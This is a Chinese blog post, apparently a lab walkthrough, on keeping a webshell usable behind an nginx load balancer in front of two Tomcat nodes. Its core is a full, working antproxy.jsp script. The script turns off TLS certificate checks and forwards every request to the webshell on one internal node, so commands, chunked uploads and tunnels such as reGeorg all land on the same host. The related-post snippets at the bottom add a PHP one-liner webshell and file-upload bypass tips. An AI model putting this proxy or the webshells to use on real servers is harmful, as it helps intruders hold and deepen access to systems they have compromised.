负载均衡反向代理下的webshell上传

已于 2022-11-28 13:28:10 修改
阅读量1k 收藏
点赞数
分类专栏: Linux 网络 前端 文章标签: 安全 网络安全 负载均衡 运维
于 2022-11-27 22:43:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59280309/article/details/128068664
版权
Linux 同时被 3 个专栏收录
32 篇文章 0 订阅
订阅专栏
网络
14 篇文章 0 订阅
订阅专栏
前端
14 篇文章 0 订阅
订阅专栏

目录

架构如下:

实验环境:AntSword-Labshttps://github.com/AntSwordProject/AntSword-Labs

搭建环境:

启动环境:

 测试连接:

地址不停的在漂移会造成的问题:

难点一:我们需要在每一台节点的相同位置都上传相同内容的 WebShell:

难点二:我们在执行命令时,无法知道下次的请求交给哪台机器去执行。

难点三:当我们需要上传一些工具时,麻烦来了:

难点四:由于目标机器不能出外网,想进一步深入,只能使用 reGeorg/HTTPAbs 等 HTTP Tunnel,可在这个场景下,这些 tunnel 脚本全部都失灵了。

解决方案:

一:关掉其中一台机器

二:执行前先判断要不要执行

三: 在Web 层做一次 HTTP 流量转发 (重点)

具体操作:

架构如下:

假定业务中存在RCE漏洞,上传了 WebShell 之后, 因为负载均衡的存在, 导致后续上传的工具、执行命令等操作出现不连续的情况。

演示环境中, LBSNode1 和 LBSNode2 均存在位置相同的 Shell: ant.jsp【LBSNode1和LBSNode2 无法访问外网

Node1 和 Node2 均是 tomcat 8 ,在内网中开放了 8080 端口,我们在外部是没法直接访问到的。 我们只能通过 nginx 这台机器访问。nginx 的配置如下:

实验环境:
AntSword-Labshttps://github.com/AntSwordProject/AntSword-Labs

搭建环境:

docker-compose build

启动环境:

docker-compose up -d

 测试连接:

 用 "hostname -i" 发现地址不停的在漂移

地址不停的在漂移会造成的问题:

难点一:我们需要在每一台节点相同位置都上传相同内容的 WebShell:

一旦有一台机器上没有,那么在请求轮到这台机器上的时候,就会出现 404 错误,影响使用。是的,这就是你出现一会儿正常,一会儿错误的原因。

难点二:我们在执行命令时,无法知道下次的请求交给哪台机器去执行

我们执行 ifconfig 查看当前执行机器的 ip 时,可以看到一直在飘,因为我们用的是轮询的方式,还算能确定,一旦涉及了权重等其它指标,就让你好好体验一波什么叫飘乎不定。

难点三:当我们需要传一些工具时,麻烦来了

由于 antSword 上传文件时,采用的分片上传方式,把一个文件分成了多次HTTP请求发送给了目标,所以尴尬的事情来了,两台节点上,各一半,而且这一半到底是怎么组合的,取决于 LBS 算法

难点四:由于目标机器不能出外网,想进一步深入,只能使用 reGeorg/HTTPAbs 等 HTTP Tunnel,可在这个场景下,这些 tunnel 脚本全部都失灵了。

解决方案:

一:掉其中一台机器

这个方案影响业务,还会造成灾难,直接 Pass 不考虑。真实环境下千万不要尝试!!!!

二:执行前先判断要不要执行

我们既然无法预测下一次是哪台机器去执行,那我们的 Shell 在执行 Payload 之前,先判断一下要不要执行:

MYIP=`ifconfig | grep "inet 172" | awk '{print $2}'`
echo $MYIP

 这样一来,确实是能够保证执行的命令是在我们想要的机器上了,可是这样执行命令,不够丝滑,一点美感都没有。另外,上传文件、HTTP 隧道 这些要怎么解决?

三: Web 层做一次 HTTP 流量转发 (重点)

没错,我们用 AntSword 没法直接访问 LBSNode1 内网IP(172.23.0.2)的 8080 端口,但是有人能访问呀,除了 nginx 能访问之外,LBSNode2 这台机器也是可以访问 Node1 这台机器的 8080 端口的。

我们的目的是:所有的数据包都能发给「LBSNode 1」这台机器。

首先是 第 1 步,我们请求 /antproxy.jsp,这个请求发给 nginx

nginx 接到数据包之后,会有两种情况:

第 2 步把请求传递给了目标机器,请求了 Node1 机器上的 /antproxy.jsp,接着 第 3 步,/antproxy.jsp 把请求重组之后,传给了 Node1 机器上的 /ant.jsp,成功执行。

第 2 步把请求传给了 Node2 机器, 接着第 3 步,Node2 机器上面的 /antproxy.jsp 把请求重组之后,传给了 Node1 的 /ant.jsp,成功执行。

具体操作:

1.创建 antproxy.jsp 脚本

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
  public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }
    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            public X509Certificate[] getAcceptedIssuers() {
                return null;
            }
            @Override
            public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
            @Override
            public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
        } };
        try {
            SSLContext sc = SSLContext.getInstance("TLS");
            sc.init(null, trustAllCerts, new java.security.SecureRandom());
            HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        } catch (KeyManagementException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
%>
<%
        String target = "http://172.18.0.2:8080/ant.jsp";
        URL url = new URL(target);
        if ("https".equalsIgnoreCase(url.getProtocol())) {
            ignoreSsl();
        }
        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        StringBuilder sb = new StringBuilder();
        conn.setRequestMethod(request.getMethod());
        conn.setConnectTimeout(30000);
        conn.setDoOutput(true);
        conn.setDoInput(true);
        conn.setInstanceFollowRedirects(false);
        conn.connect();
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        OutputStream out2 = conn.getOutputStream();
        DataInputStream in=new DataInputStream(request.getInputStream());
        byte[] buf = new byte[1024];
        int len = 0;
        while ((len = in.read(buf)) != -1) {
            baos.write(buf, 0, len);
        }
        baos.flush();
        baos.writeTo(out2);
        baos.close();
        InputStream inputStream = conn.getInputStream();
        OutputStream out3=response.getOutputStream();
        int len2 = 0;
        while ((len2 = inputStream.read(buf)) != -1) {
            out3.write(buf, 0, len2);
        }
        out3.flush();
        out3.close();
%>

修改转发地址,转向目标 Node 的 内网IP的 目标脚本 访问地址。

注意:不仅仅是 WebShell 哟,还可以改成 reGeorg 等脚本的访问地址。

我们将 target 指向了 LBSNode1 的 ant.jsp

注意:

a) 不要使用上传功能,上传功能会分片上传,导致分散在不同 Node 上。

b) 要保证每一台 Node 上都有相同路径的 antproxy.jsp, 所以我疯狂保存了很多次,保证每一台都上传了脚本

 多上传几次就成功了:【上传路径:/usr/local/tomcat/webapps/ROOT】

 2. 修改 Shell 配置, 将 URL 部分填写为 antproxy.jsp 的地址,其它配置不变

 3. 测试执行命令, 查看 IP

可以看到 IP 已经固定, 意味着请求已经固定到了 LBSNode1 这台机器上了。此时使用分片上传、HTTP 代理,都已经跟单机的情况没什么区别了。

戲子 鬧京城°ぃ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Webshell方式
悦分享
07-31 3719
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
网络安全笔记-WebShell与文件上
L120305q的博客
08-17 2799
网络安全笔记-WebShell与文件上
nginx负载均衡下的webshell
m0_63069714的博客
02-14 527
因为我们是反向代理负载均衡,就存在上文件出现一台后端服务器上有我们上的文件,另一台服务器上没有我们上的文件,出现的结果就是,一旦一台服务器上没有,那么在请求轮到这台服务器的时候,就会报出404的错误,从而影响使用,这也就是一会出现正常,一会出现错误的原因。当我们上一个较大的文件时,由于AntSword上文件时,采用的是分片上方式,把一个文件分成了多次HTTP请求发送给目标,造成文件的一部分内容在A这台服务器上,另一部分文件在B这台服务器上,从而使得较大的工具或者文件无法打开或者使用。
突破VirtualWall上webshell
Coisini的博客
06-13 265
打开目标站点看了一下用的是易想商务网慧聪网风格V2.5 的商务建站系统! 随手看了一下,用NC提交注册一个用户名为woc.asp的用户名。系统会自动新建一个以用户名为命名的文件夹 然后来到相册管理,上一个改后缀为JPG的ASP大马。本来以为秒了 尼玛的,不给力 给拦截了,百思不其解,心想可能这马加密不够,蛋疼的拖来一个合并图片的一句话 可还是给拦截了,于是抓包看了一下上地址的URL htt...
如何上WEBSHELL思路
12-26
如何上WEBSHELL思路 如何上WEBSHELL思路 如何上WEBSHELL思路
网络安全-负载均衡下的webshell连接
01-27
网络安全-负载均衡下的webshell连接
利用 通达OA 文件上漏洞上webshell获取主机权限
最新发布
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上漏洞往靶机上上了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
WebShell文件上漏洞分析溯源
02-22
WebShell文件上漏洞
linux下的webshell查杀工具
04-03
一款好用的linux下的webshell查杀软件。linux下的webshell查杀工具很少,所以这里分享出来。用于发现服务器上的web后门 官方网站地址:https://www.shellpub.com
文件上Webshell连接方法
saber的博客
04-19 5297
Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页木马后门,攻击者可以通过这种网页后门获得网站服务器操作权限,控制网站服务器以进行上下载文件, 查看数据库执行命令 通过服务器开放的端口获取服务器的某些权限。往目标网站中上一句话木马,然后你就可以在本地通过Shell管理工具连接即可获取和控制整个网站目录。
开源Webshell利用工具Altman
07-24
开源Webshell利用工具——Altman: Altman基于.Net4.0开发,兼容Mono,理论上可以运行在windows、linux和mac等平台。(windows和ubuntu平台已经详细测试过,完美运行)是的,一直工作在kali下的同学有福了,只要简单的配置一下,Altman就可以运行在kaili上了( 需要安装Mono(>=3.2.8)以及libgdiplus)Altman整个程序采
webshell方法小结
Breeze的博客
04-22 3万+
木马拿webshell的几种方法汇总(不全) 普通权限下拿webshell 使用sql注入拿webshell 头像上木马 文件上漏洞 远程命令执行 xss和sql注入联合利用 网站写权限漏洞 通用漏洞 拿到后台管理权限下上木马 直接上 修改上类型 数据库备份上木马 突破JavaScript限制上类型 上其他脚本类型 %00截断 服务器解析漏洞 利用编辑器 网站配置 编辑...
Web安全之文件上
qq_42751192的博客
06-13 2020
文件上漏洞是 Web 安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上漏洞顾名思义,就是攻击者上了一个可执行文件如木马,病毒,恶意脚本,WebShell 等到服务器执行,并最终获得网站控制权限的高危漏洞。大部分的网站和应用系统都有上功能,而程序员在开发任意文件上功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。
webshell(入侵目标页面主机靶机演示)
weixin_45571987的博客
09-14 1987
webshell新手演示写好一句话木马寻找页面上点(上木马)寻找上后的文件位置(绝对路径)连接上目标主机找到目标flag 写好一句话木马 <?php eval(@$_POST['shell']); ?> webshell的分类 ①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:jsp、asp、aspx、php 写成php形式 寻找页面上点(上木马) 在上一篇内容中我们知道了如何用sqlmap注入获取后台的账号密码,登录
WEB入门——文件上漏洞
HasntStartIsOver的博客
06-04 4857
文件上漏洞服务端代码未对客户端上的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上图片,JS脚本显示了只能上图片格式,不能上.php后缀的文件)。1、上的文件是web脚本语言,服务器的web容器解释并执行了用户上的脚本,脚本语言执行。
disable path length limit_通过Antsword看绕过disable_functions
weixin_39673303的博客
11-21 3764
0x00 前言在实际渗透一些php站的时候,时常会遇到有了webshell,却无法执行命令的情况,大多数是因为使用 disablefunctions 禁用了命令执行的相关函数。判断某种绕过方法的关联依赖函数是否也被禁用了或者依赖环境是否可用是较麻烦的,本文则主要讲Antsword插件实现的disablefunctions方法及整理的其他公开可利用方式。0x01 Antsword自18年...
nc65命令执行漏洞上webshell学习笔记
corner55的博客
10-28 3323
命令执行漏洞上webshell学习笔记,测试环境nc65命令执行漏洞
中国蚁剑(AntSword)安装、使用教程
热门推荐
丶没胡子的猫
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
WEBSHELL姿势之文件上漏洞(渗透实验)
forbidd3n,keep going
10-14 1万+
实验场景  某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心服务器进行入侵测试,据了解,该web服务器(10.1.1.178)上 C:\consle存储有银行的关键敏感数据。 目标任务       请以下列任务为目标进行入侵渗透 :       1、利用网站漏洞获取该服务器shell;(网页关入侵--铜牌任务)
webshell原理
07-28
Webshell原理是指将Webshell(一段具有恶意功能的代码)通过某种方式上至目标服务器的过程。常见的上方式有以下几种: 1. 文件上漏洞:目标服务器上存在未正确过滤或验证用户上文件的代码,攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戲子 鬧京城°ぃ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值